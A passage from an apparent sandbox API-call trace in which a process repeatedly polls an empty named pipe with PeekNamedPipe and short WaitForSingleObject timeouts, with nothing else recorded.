lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.126] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.159] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.159] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.188] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.188] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.220] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.221] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.251] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.251] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.283] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.283] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.313] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.313] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.345] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.345] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.548] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.548] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.579] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.579] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.609] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.610] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.642] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.642] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.680] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.680] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.704] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.704] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.734] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.734] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.766] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.766] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.809] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.810] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.831] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.831] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.859] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.859] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.893] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.893] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.921] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.922] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.954] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.954] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0121.985] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0121.985] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.018] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.019] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.046] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.046] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.080] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.081] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.109] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.109] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.141] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.141] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.172] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.172] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.203] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.203] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.234] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.234] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.266] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.266] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.296] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.296] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.328] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.328] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.358] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.358] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.391] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.391] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.421] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.421] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.453] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.453] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.483] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.483] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.516] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.516] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.545] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.546] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.578] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.578] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.608] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.608] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.640] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.640] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.678] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.678] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.702] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.702] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.733] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.733] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.765] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.765] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.795] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.795] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.827] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.827] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.858] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.858] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.890] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.890] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.920] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.920] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.952] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.952] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0122.983] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0122.983] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.016] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.017] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.045] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.045] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.077] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.077] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.107] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.107] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.139] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.139] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.170] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.170] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.202] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.202] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.232] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.232] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.264] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.264] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.294] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.294] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.327] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.327] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.357] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.357] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.389] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.389] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.419] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0123.419] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0123.454] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, 